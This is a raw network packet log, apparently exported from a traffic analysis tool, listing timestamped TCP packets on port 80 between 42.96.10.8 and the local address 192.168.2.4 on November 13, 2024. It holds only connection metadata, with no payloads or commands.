                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659972906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.659990072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660046101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660060883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660085917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660124063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660132885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660149097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660217047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660232067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660235882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660253048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660268068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660293102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660295010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660312891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660327911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660336971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660346031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660377979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660387039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660393953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660397053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660410881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660429001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660451889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660469055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660492897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660509109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660525084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660540104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660557032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660567999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660610914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660640001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660656929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660671949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660686970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660695076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660702944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660721064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660736084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660737038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660753965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660762072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660788059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660887957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660904884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660919905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660933971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660948992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660964012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660980940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.660995960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661010981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661011934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661011934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661011934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661034107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661046982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661086082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661119938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661137104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661151886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661190987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661205053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661211967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661211967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661233902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661248922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661266088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661271095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661279917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661297083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661304951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661313057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661343098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661348104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661364079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661387920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661390066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661403894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661408901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661422968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661458015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661474943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661489964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661506891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661524057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661535025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661535025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661542892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661564112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661573887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661632061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661648989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661664963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661674023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661683083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661700964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661716938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661731005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661756039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661756039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.661830902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662004948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662034035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662048101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662090063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662106991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662187099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662204981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662220955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662256956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662256956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662256956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662261009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662288904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662290096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662305117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662321091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662343979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662349939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662359953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662365913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662378073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662391901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662408113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662421942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662435055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662448883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662465096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662478924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662478924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662482023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662499905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662518024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662533998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662550926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662564039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662584066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662599087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662612915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662612915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662614107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662667036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662682056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662697077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662705898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662718058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662740946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662794113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662807941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662822008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662833929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662837982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662854910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662909985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.662909985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.668884039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.668978930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.668993950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669011116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669023037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669035912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669064999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669068098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669084072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669117928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669122934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669132948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669141054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669157028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669173002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669188976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669229031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669452906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669570923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669599056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669614077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669668913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669668913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669673920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669692039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669740915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669756889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669774055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669778109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669789076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669811010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669815063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669831991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669847012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669852018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669864893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669881105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669895887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669912100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669924974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669924974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669936895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669949055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669950962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669966936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669984102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.669997931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670003891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670016050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670028925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670034885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670047045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670063972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670079947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670094967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670104980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670104980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670111895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670133114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670146942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670161963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670176029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670176029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670176029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670177937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670197964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670216084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670281887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670298100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670314074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670321941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670331001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670347929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670377016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670398951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670413971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670428038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670444012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670459986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670475960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670495987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670495987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670500040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670511961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670511961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670517921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670536041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670551062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670566082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670583010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670598984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670603037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670603037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670617104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670634031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670639992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670639992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670650005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670665979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670718908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670718908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670835018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670905113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670918941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670933962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.670953989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671252966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671253920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671269894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671287060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671320915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671324015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671338081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671354055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671369076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671377897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671387911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671425104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671425104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671467066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671483040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671498060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671513081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671529055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671542883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671542883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671566010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671571970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.671587944 CET804973342.96.10.8192.168.2.4
